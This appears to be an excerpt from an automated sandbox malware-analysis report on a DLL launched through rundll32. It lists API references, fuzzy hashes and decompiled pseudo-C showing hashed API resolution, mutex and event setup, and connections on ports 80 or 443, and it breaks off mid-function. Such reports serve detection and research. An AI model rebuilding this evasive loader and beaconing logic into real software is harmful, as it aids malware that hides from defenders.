                  0x1800058f3
                  0x1800058ff
                  0x18000590d
                  0x180005912
                  0x180005926
                  0x18000593a
                  0x18000594d
                  0x180005954
                  0x180005958
                  0x180005963
                  0x18000596d
                  0x180005976
                  0x180005983
                  0x180005990
                  0x180005998
                  0x1800059a1
                  0x1800059b9
                  0x1800059c4
                  0x1800059cc
                  0x1800059d6
                  0x1800059dc
                  0x1800059fb

                  APIs
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005833
                  • SetEvent.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005856
                  • WaitForSingleObject.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000589C
                  • memset.NTDLL(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005926
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005990
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: FreeHeap$EventObjectSingleWaitmemset
                  • String ID: ))8M$6$H$lJu
                  • API String ID: 2222956709-2816507560
                  • Opcode ID: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
                  • Instruction ID: 785fb66ca69b8b0f02f3e946b07437a251f863b49ae3d9a65a40210c3f307c76
                  • Opcode Fuzzy Hash: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
                  • Instruction Fuzzy Hash: 9A61B231205B4D86FBE7DA56A4843EB3291A74DBD2F54C026FE895B7D5DE28CA4EC300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 24%
                  			E00000001180004A14(void* __ebx, void* __ecx, long long* __rax, long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24, long long* _a40, void* _a48, intOrPtr _a56) {
                  				void* _v40;
                  				char _v80;
                  				intOrPtr _v88;
                  				char _v96;
                  				char _v104;
                  				intOrPtr _v120;
                  				long long _v128;
                  				long long _v136;
                  				char _t57;
                  				intOrPtr _t95;
                  				void* _t96;
                  				long long* _t114;
                  				long long* _t115;
                  
                  				_t114 = __rax;
                  				_a8 = __rbx;
                  				_a16 = __rbp;
                  				_a24 = __rsi;
                  				_t141 =  *0x8000d4a0;
                  				r14d = __ecx;
                  				_t95 = r8d;
                  				E0000000118000459C(0x4e1c2e77, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004a75;
                  				r9d = 0x18;
                  				r8d = 0;
                  				_v136 = 0xf0000040;
                  				 *_t114();
                  				goto 0x80004a77;
                  				if (0 == 0) goto 0x80004c20;
                  				r8d = _a56;
                  				_t10 =  &_v96; // -190
                  				if (E00000001180006D04(__rbx, _v88, __rsi, _t10) != 0) goto 0x80004c02;
                  				_t11 = _t114 + 0x10; // 0x10
                  				r15d = _t11;
                  				memset(??, ??, ??);
                  				E0000000118000459C(0xd74cfe41, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004ae3;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004ae5;
                  				if (0 != 0) goto 0x80004af9;
                  				if (GetLastError() != 0) goto 0x80004c02;
                  				_t57 =  >  ? r15d : _t95;
                  				r8d = _t57;
                  				_v104 = _t57;
                  				memcpy(??, ??, ??);
                  				_t96 = _t95 - _v104;
                  				if (r14d == 0) goto 0x80004b70;
                  				E0000000118000459C(0x4217c141, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004baa;
                  				r8d = 0;
                  				_t23 =  &_v104; // -198
                  				_v120 = 0x20;
                  				_v128 = _t23;
                  				_t26 =  &_v80; // -174
                  				r8b = _t96 == 0;
                  				_v136 = _t26;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004bac;
                  				E0000000118000459C(0x8ea73a36, _t114, _v96);
                  				if (_t114 == 0) goto 0x80004baa;
                  				r8d = 0;
                  				_t29 =  &_v104; // -198
                  				_v128 = _t29;
                  				r8b = _t96 == 0;
                  				_t31 =  &_v80; // -174
                  				_v136 = _t31;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004bac;
                  				if (0 == 0) goto 0x80004bd6;
                  				r8d = _v104;
                  				memcpy(??, ??, ??);
                  				if (_t96 == 0) goto 0x80004bde;
                  				goto 0x80004afd;
                  				GetLastError();
                  				_t115 = _a40;
                  				 *_t115 = 0 + _v104;
                  				E0000000118000459C(0xff709000, _t115,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t115 == 0) goto 0x80004c02;
                  				 *_t115();
                  				E0000000118000459C(0xbaca8f4d, _t115,  *((intOrPtr*)(_t141 + 0x20)));
                  				if (_t115 == 0) goto 0x80004c28;
                  				 *_t115();
                  				goto 0x80004c28;
                  				return GetLastError();
                  			}
















                  0x180004a14
                  0x180004a14
                  0x180004a19
                  0x180004a1e
                  0x180004a33
                  0x180004a3a
                  0x180004a4c
                  0x180004a4f
                  0x180004a57
                  0x180004a5e
                  0x180004a64
                  0x180004a69
                  0x180004a71
                  0x180004a73
                  0x180004a79
                  0x180004a7f
                  0x180004a94
                  0x180004aa2
                  0x180004aa8
                  0x180004aa8
                  0x180004ab7
                  0x180004ac5
                  0x180004acd
                  0x180004adc
                  0x180004adf
                  0x180004ae1
                  0x180004ae7
                  0x180004af3
                  0x180004b07
                  0x180004b0e
                  0x180004b11
                  0x180004b15
                  0x180004b1e
                  0x180004b2c
                  0x180004b33
                  0x180004b3b
                  0x180004b3d
                  0x180004b40
                  0x180004b45
                  0x180004b4d
                  0x180004b52
                  0x180004b59
                  0x180004b5d
                  0x180004b67
                  0x180004b6c
                  0x180004b6e
                  0x180004b75
                  0x180004b7d
                  0x180004b7f
                  0x180004b82
                  0x180004b89
                  0x180004b8e
                  0x180004b92
                  0x180004b97
                  0x180004ba1
                  0x180004ba6
                  0x180004ba8
                  0x180004bae
                  0x180004bb0
                  0x180004bbd
                  0x180004bcf
                  0x180004bd1
                  0x180004bd6
                  0x180004bde
                  0x180004beb
                  0x180004bf1
                  0x180004bf9
                  0x180004c00
                  0x180004c0b
                  0x180004c13
                  0x180004c1c
                  0x180004c1e
                  0x180004c4a

                  APIs
                    • Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8
                  • memset.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AB7
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AE9
                  • memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004B15
                  • memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BBD
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BD6
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004C20
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorLast$memcpy$memset
                  • String ID: $@
                  • API String ID: 1408984137-1077428164
                  • Opcode ID: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
                  • Instruction ID: 6549d2ab533297c31cadfe8b85b87dceba819ad31def954566d9370a515f3166
                  • Opcode Fuzzy Hash: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
                  • Instruction Fuzzy Hash: A851607330574982EBA2DBA5A45079AB7A0FBCC7D0F548411BE8D87B49DF78CA08CB04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E00000001180003A24(long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
                  				void* __rdi;
                  				long _t49;
                  				void* _t54;
                  				void* _t72;
                  				signed long long _t94;
                  				signed long long _t95;
                  				long long* _t97;
                  				int _t112;
                  				void* _t113;
                  				signed long long _t118;
                  				void* _t120;
                  				long long* _t126;
                  				void* _t128;
                  				signed long long _t129;
                  				void* _t131;
                  
                  				 *((long long*)(_t120 + 8)) = __rbx;
                  				 *(_t120 + 0x10) = _t118;
                  				 *((long long*)(_t120 + 0x18)) = __rsi;
                  				_t116 =  *0x8000d4a0;
                  				_t113 = __r9;
                  				_t97 = __rcx;
                  				if (__r9 != 0) goto 0x80003a5b;
                  				goto 0x80003be2;
                  				r8d = 0x10;
                  				memcpy(_t131, _t128, _t112);
                  				InitializeCriticalSection(??);
                  				_t6 = _t97 + 0x88; // 0x88
                  				_t126 = _t6;
                  				 *((long long*)(__rcx + 0xa0)) = 0x180002f24;
                  				_t129 = _t128 | 0xffffffff;
                  				 *((long long*)(__rcx + 0xa8)) = E00000001180007A7C;
                  				r13d = _t129 + 2;
                  				r9d = 0;
                  				r8d = 0;
                  				 *((long long*)(__rcx + 0x98)) = E00000001180008368;
                  				 *((long long*)(__rcx + 0x90)) = _t126;
                  				 *_t126 = _t126;
                  				 *(__rcx + 0x10) = _t129;
                  				CreateEventA(??, ??, ??, ??);
                  				 *((long long*)(__rcx + 0x20)) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				r9d = 0;
                  				r8d = 0;
                  				CreateEventA(??, ??, ??, ??);
                  				 *((long long*)(__rcx + 0x30)) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				 *(__rcx + 0x38) =  *(__rcx + 0x38) & _t118;
                  				r8d = 0;
                  				CreateMutexA(??, ??, ??);
                  				 *((long long*)(__rcx + 0x28)) = E00000001180008368;
                  				 *(__rcx + 0x38) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				E00000001180001C00(0, __rcx, __r9, __r9,  *0x8000d4a0, _t118);
                  				 *_t97 = E00000001180008368;
                  				E0000000118000459C(0x176fdd38, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				_t72 = _t129 + 7;
                  				if (E00000001180008368 == 0) goto 0x80003b4c;
                  				r8d = _t72;
                  				E00000001180008368(_t54, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)), _t118);
                  				goto 0x80003b4f;
                  				_t94 = _t129;
                  				 *(_t97 + 0x10) = _t94;
                  				if (_t94 != _t129) goto 0x80003bb0;
                  				E0000000118000459C(0xb27f4910, _t94,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t94 == 0) goto 0x80003b79;
                  				 *_t94();
                  				goto 0x80003b7b;
                  				if (0 != 0) goto 0x80003bd6;
                  				E0000000118000459C(0x176fdd38, _t94,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t94 == 0) goto 0x80003ba4;
                  				r8d = _t72;
                  				 *_t94();
                  				goto 0x80003ba7;
                  				_t95 = _t129;
                  				 *(_t97 + 0x10) = _t95;
                  				if (_t95 == _t129) goto 0x80003bd6;
                  				_t28 = _t97 + 0x18; // 0x18
                  				E00000001180006C8C(2, _t95, _t97, E0000000118000431C, _t97, _t116, _t118, _t28);
                  				 *(_t97 + 8) = _t95;
                  				if (_t95 == 0) goto 0x80003bd6;
                  				SwitchToThread();
                  				goto 0x80003c03;
                  				_t49 = GetLastError();
                  				if (_t49 == 0) goto 0x80003c03;
                  				E00000001180007950(r13d, _t97, _t97, _t113, _t116, _t118);
                  				if (r13d == 0) goto 0x80003c03;
                  				E0000000118000459C(0x9cb92d3f, _t95,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t95 == 0) goto 0x80003c03;
                  				 *_t95();
                  				return _t49;
                  			}


















                  0x180003a24
                  0x180003a29
                  0x180003a2e
                  0x180003a3f
                  0x180003a48
                  0x180003a4b
                  0x180003a51
                  0x180003a56
                  0x180003a5f
                  0x180003a65
                  0x180003a6e
                  0x180003a74
                  0x180003a74
                  0x180003a82
                  0x180003a89
                  0x180003a94
                  0x180003aa2
                  0x180003aa7
                  0x180003aaa
                  0x180003ab2
                  0x180003ab9
                  0x180003ac0
                  0x180003ac3
                  0x180003ac7
                  0x180003acd
                  0x180003ad4
                  0x180003ada
                  0x180003add
                  0x180003ae5
                  0x180003aeb
                  0x180003af2
                  0x180003af8
                  0x180003afc
                  0x180003b03
                  0x180003b09
                  0x180003b0d
                  0x180003b14
                  0x180003b1f
                  0x180003b29
                  0x180003b30
                  0x180003b35
                  0x180003b3d
                  0x180003b42
                  0x180003b48
                  0x180003b4a
                  0x180003b4c
                  0x180003b4f
                  0x180003b56
                  0x180003b61
                  0x180003b69
                  0x180003b75
                  0x180003b77
                  0x180003b7d
                  0x180003b8b
                  0x180003b93
                  0x180003b95
                  0x180003ba0
                  0x180003ba2
                  0x180003ba4
                  0x180003ba7
                  0x180003bae
                  0x180003bb0
                  0x180003bbe
                  0x180003bc3
                  0x180003bca
                  0x180003bcc
                  0x180003bd4
                  0x180003bd6
                  0x180003be0
                  0x180003be5
                  0x180003bec
                  0x180003bf7
                  0x180003bff
                  0x180003c01
                  0x180003c21

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseCriticalHandleSection$CreateEvent$DeleteEnterErrorFreeHeapInitializeLastLeaveMutexObjectSingleSleepSwitchThreadWaitmemcpy
                  • String ID:
                  • API String ID: 810493412-0
                  • Opcode ID: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
                  • Instruction ID: da56e0963138b123f8a3a91eab94b9da458cf35c37d31fe2a2e97a6efbfc397b
                  • Opcode Fuzzy Hash: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
                  • Instruction Fuzzy Hash: 5F51C332301B4882EB97DF22A4117DA73A8FB8CBD8F448524AE5D47795EF38CA09C350
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 54%
                  			E00000001180002B60(void* __esi, void* __rcx, void* __r9, void* __r10, signed long long __r11) {
                  				void* __rbx;
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t79;
                  				signed int _t94;
                  				void* _t143;
                  				void* _t144;
                  				long long _t174;
                  				long long* _t175;
                  				long long* _t178;
                  				void* _t180;
                  				long long _t182;
                  				void* _t190;
                  				intOrPtr _t211;
                  				void* _t224;
                  				void* _t225;
                  				long long _t228;
                  				void* _t229;
                  				void* _t255;
                  				signed long long _t256;
                  
                  				_t256 = __r11;
                  				_t255 = __r10;
                  				_t144 = __esi;
                  				_t174 = _t228;
                  				_t229 = _t228 - 0x60;
                  				r12d =  *0x8000d498;
                  				 *(_t174 + 0x20) =  *(_t174 + 0x20) & 0x00000000;
                  				_t225 = __rcx;
                  				if (E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x28, __rcx) != 0) goto 0x80002bd9;
                  				_t79 = E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x20, _t225);
                  				if (_t79 == 0) goto 0x80002bd9;
                  				HeapFree(??, ??, ??);
                  				if (_t79 != 0) goto 0x80002f0d;
                  				_t190 = _t229 + 0x48;
                  				if (E00000001180008C60(_t180, _t190, _t224, _t225) != 0) goto 0x80002ed2;
                  				r9d =  *( *((intOrPtr*)(_t225 + 0x40)) + 2) & 0x0000ffff;
                  				if (_t190 - __r9 + 8 <= 0) goto 0x80002c2b;
                  				if ((r12d ^ 0xe49a1e6d) == 0) goto 0x80002c2d;
                  				E00000001180004ED8(r12d ^ 0xe49a1e6d, __r9 +  *((intOrPtr*)(_t225 + 0x40)) + 8);
                  				_t182 = _t174;
                  				goto 0x80002c2d;
                  				if (_t182 == 0) goto 0x80002ec8;
                  				_t21 = _t225 + 0xb0; // 0xb0
                  				 *((long long*)(_t229 + 0x28)) = _t182;
                  				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
                  				if (E000000011800022AC(_t182, _t174, _t182, _t21,  *((intOrPtr*)(_t229 + 0x48)), _t225,  *0x8000d490,  *((intOrPtr*)(_t225 + 0x30)),  *((intOrPtr*)(_t225 + 0x38))) != 0) goto 0x80002ec8;
                  				_t175 =  *((intOrPtr*)(_t225 + 0x28));
                  				 *((long long*)(_t229 + 0x40)) = _t175;
                  				if (E00000001180002370(r12d ^ 0x61f25585, _t175, _t182, _t256) != 0) goto 0x80002caf;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)),  *((intOrPtr*)(_t229 + 0x48)), _t229 + 0xa8) == 0) goto 0x80002caf;
                  				goto 0x80002cb8;
                  				 *(_t229 + 0xa8) = 0;
                  				E0000000118000459C(0xab05e147, _t175,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				r15d = 0x7f;
                  				if (_t175 == 0) goto 0x80002cec;
                  				r9d = 0;
                  				r8d = 0;
                  				 *_t175();
                  				goto 0x80002cef;
                  				if (r15d != 0x102) goto 0x80002ec8;
                  				 *(_t225 + 0x64) = 0x3e8;
                  				if (E00000001180002370(r12d ^ 0x64d094d6, _t175, _t182, _t256) != 0) goto 0x80002d41;
                  				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
                  				r9d = 0;
                  				E00000001180002668(_t175, _t182, _t225, 0x180001844, _t225,  *0x8000d490,  *((intOrPtr*)(_t229 + 0x38)), _t229 + 0xb0);
                  				if (E00000001180002370(r12d ^ 0xdd4632ba, _t175, _t182, _t256) != 0) goto 0x80002d8f;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002d8f;
                  				_t94 =  *(_t229 + 0xa8);
                  				if (_t94 == 0) goto 0x80002d8f;
                  				 *(_t225 + 0x64) = _t94 * 0x3e8;
                  				if (E00000001180002370(r12d ^ 0x705ce798, _t175, _t182, _t256) != 0) goto 0x80002dd2;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002dd2;
                  				goto 0x80002ddb;
                  				 *(_t229 + 0xa8) = 0;
                  				r12d = r12d ^ 0xe5c7ba87;
                  				if (E00000001180002370(r12d, _t175, _t182, _t256) != 0) goto 0x80002e40;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8) == 0) goto 0x80002e40;
                  				GetSystemTimeAsFileTime(??);
                  				r11d =  *((intOrPtr*)(_t229 + 0xb8));
                  				 *((intOrPtr*)(_t225 + 0x60)) = r11d;
                  				_t178 = _t256 * 0x23c34600 +  *((intOrPtr*)(_t229 + 0x50));
                  				 *((long long*)(_t225 + 0x58)) = _t178;
                  				if (E00000001180007DBC(0, E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8), _t225, _t229 + 0x58, _t229 + 0x30) != 0) goto 0x80002e68;
                  				r8d =  *((intOrPtr*)(_t229 + 0x30));
                  				E0000000118000137C(_t144, _t182, _t225,  *((intOrPtr*)(_t229 + 0x58)), _t255);
                  				E0000000118000459C(0xab05e147, _t178,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t178 == 0) goto 0x80002e97;
                  				r8d = 0;
                  				r9d = 0;
                  				r9d = r9d * 0x3e8;
                  				 *_t178();
                  				goto 0x80002e9a;
                  				_t143 = r15d;
                  				if (_t143 != 0) goto 0x80002e40;
                  				if ( *((intOrPtr*)(_t225 + 0x50)) == 0) goto 0x80002ec8;
                  				E00000001180007950(0xab05e147,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *((intOrPtr*)(_t225 + 0x50)), _t224,  *((intOrPtr*)(_t225 + 0x50)),  *0x8000d490);
                  				HeapFree(??, ??, ??);
                  				E00000001180002620();
                  				_t211 =  *0x8000d4a0;
                  				if ( *((intOrPtr*)(_t211 + 0x20)) == 0) goto 0x80002ef8;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t211 + 0x28)) == 0) goto 0x80002f0d;
                  				HeapFree(??, ??, ??);
                  				asm("lock inc ecx");
                  				return _t143;
                  			}
























                  0x180002b60
                  0x180002b60
                  0x180002b60
                  0x180002b60
                  0x180002b6d
                  0x180002b7f
                  0x180002b86
                  0x180002b8a
                  0x180002ba9
                  0x180002bb7
                  0x180002bc0
                  0x180002bd3
                  0x180002bdb
                  0x180002be1
                  0x180002bef
                  0x180002bfc
                  0x180002c11
                  0x180002c1a
                  0x180002c21
                  0x180002c26
                  0x180002c29
                  0x180002c30
                  0x180002c43
                  0x180002c4a
                  0x180002c4f
                  0x180002c5d
                  0x180002c63
                  0x180002c80
                  0x180002c8c
                  0x180002ca4
                  0x180002cad
                  0x180002cb1
                  0x180002cc1
                  0x180002cc6
                  0x180002ccf
                  0x180002ce0
                  0x180002ce3
                  0x180002ce6
                  0x180002cea
                  0x180002cf5
                  0x180002d14
                  0x180002d22
                  0x180002d29
                  0x180002d36
                  0x180002d3c
                  0x180002d61
                  0x180002d79
                  0x180002d7b
                  0x180002d84
                  0x180002d8c
                  0x180002daf
                  0x180002dc7
                  0x180002dd0
                  0x180002dd4
                  0x180002ddb
                  0x180002dfc
                  0x180002e14
                  0x180002e1b
                  0x180002e21
                  0x180002e2c
                  0x180002e37
                  0x180002e3c
                  0x180002e54
                  0x180002e56
                  0x180002e63
                  0x180002e71
                  0x180002e79
                  0x180002e7b
                  0x180002e7e
                  0x180002e8a
                  0x180002e91
                  0x180002e95
                  0x180002e97
                  0x180002e9c
                  0x180002ea5
                  0x180002eb5
                  0x180002ec2
                  0x180002ecd
                  0x180002ed2
                  0x180002ee3
                  0x180002eeb
                  0x180002eff
                  0x180002f07
                  0x180002f0d
                  0x180002f23

                  APIs
                    • Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                    • Part of subcall function 0000000180002464: FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002BD3
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180002E1B
                  • HeapFree.KERNEL32 ref: 0000000180002EC2
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002EEB
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002F07
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Free$Heap$LibraryTime$FileLoadSystem
                  • String ID:
                  • API String ID: 1415693639-0
                  • Opcode ID: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
                  • Instruction ID: d455ad72a2173ea311d53c287058b5208197830efbff1c216518b590d8193917
                  • Opcode Fuzzy Hash: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
                  • Instruction Fuzzy Hash: A5A15172204B8996EBA2DB66E4407DA73A5F78D7D4F448022FA4D47A95DF38C64AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 26%
                  			E000000011800027D4(long long __rbx, intOrPtr* __rcx, void* __rdx) {
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t100;
                  				long long* _t119;
                  				long long* _t120;
                  				long long* _t121;
                  				long long* _t122;
                  				long long* _t123;
                  				void* _t151;
                  				void* _t152;
                  				intOrPtr* _t153;
                  				void* _t155;
                  				void* _t158;
                  				long long* _t161;
                  				void* _t163;
                  				void* _t164;
                  				long _t176;
                  				void* _t178;
                  				void* _t181;
                  				void* _t184;
                  
                  				_t123 = __rbx;
                  				 *((long long*)(_t163 + 0x10)) = __rbx;
                  				 *(_t163 + 0x18) = r8d;
                  				_t164 = _t163 - 0x50;
                  				_t119 =  *0x8000d4a0;
                  				_t156 =  *__rcx;
                  				_t153 = __rcx;
                  				r15d = r9d;
                  				E00000001180007B04(__rbx, __rdx, __rcx,  *__rcx, _t158, __rdx, _t184, _t181);
                  				if (_t119 == _t123) goto 0x80002a78;
                  				_t100 =  *((char*)(_t153 + 0x75)) - 6;
                  				_t5 = _t123 + 4; // 0x4
                  				r12d = _t5;
                  				if (_t100 > 0) goto 0x8000283e;
                  				if (_t100 != 0) goto 0x80002835;
                  				if ( *((char*)(_t153 + 0x74)) - 2 > 0) goto 0x8000283e;
                  				 *((intOrPtr*)(_t164 + 0x90)) = 0;
                  				goto 0x80002846;
                  				 *((intOrPtr*)(_t164 + 0x90)) = r12d;
                  				E0000000118000459C(0x3fe3c8ba, _t119,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t119 == _t123) goto 0x80002871;
                  				r9d = 0;
                  				r8d = 0;
                  				 *((intOrPtr*)(_t164 + 0x20)) = 0;
                  				 *_t119();
                  				goto 0x80002874;
                  				_t120 = _t123;
                  				 *((long long*)(_t153 + 0x28)) = _t120;
                  				HeapFree(_t178, _t176, _t152);
                  				if ( *((intOrPtr*)(_t153 + 0x28)) == _t123) goto 0x80002a78;
                  				if ( *((intOrPtr*)(_t164 + 0xa0)) == 0) goto 0x800028ce;
                  				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x800028c4;
                  				_t17 = _t164 + 0xa0; // 0x12
                  				r9d = r12d;
                  				 *_t120();
                  				goto 0x800028c6;
                  				if (0 == 0) goto 0x80002a78;
                  				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 8)), _t153, _t156, _t119, _t17, _t155, _t158);
                  				if (_t120 == _t123) goto 0x80002a78;
                  				 *((intOrPtr*)(_t164 + 0x90)) = 0x100;
                  				if ( *((intOrPtr*)(_t164 + 0xb0)) == 0) goto 0x80002938;
                  				 *((intOrPtr*)(_t164 + 0x40)) = 0xaa0;
                  				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x80002927;
                  				r9d = r12d;
                  				 *_t120();
                  				asm("bts dword [esp+0x90], 0x17");
                  				r12d = 0x1bb;
                  				goto 0x8000293e;
                  				r12d = 0x50;
                  				E0000000118000459C(0x7dda0345, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x80002963;
                  				r9d = 0;
                  				r8d = r12w & 0xffffffff;
                  				 *_t120();
                  				goto 0x80002966;
                  				_t121 = _t123;
                  				 *((long long*)(_t153 + 0x30)) = _t121;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t153 + 0x30)) == _t123) goto 0x80002a78;
                  				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 0x10)), _t153, _t156, _t120, _t120);
                  				_t161 = _t121;
                  				if (_t121 == _t123) goto 0x80002a78;
                  				E0000000118000459C(0xaa9d9fc1, _t121,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t121 == _t123) goto 0x800029ed;
                  				_t151 =  !=  ?  *0x8000d490 + 0x180011260 :  *0x8000d490 + 0x180011278;
                  				r9d = 0;
                  				 *((intOrPtr*)(_t164 + 0x30)) =  *((intOrPtr*)(_t164 + 0x90));
                  				 *((long long*)(_t164 + 0x28)) = _t123;
                  				 *((long long*)(_t164 + 0x20)) = _t123;
                  				 *_t121();
                  				goto 0x800029f0;
                  				_t122 = _t123;
                  				 *((long long*)(_t153 + 0x38)) = _t122;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t153 + 0x38)) == _t123) goto 0x80002a78;
                  				 *((intOrPtr*)(_t164 + 0x44)) = 4;
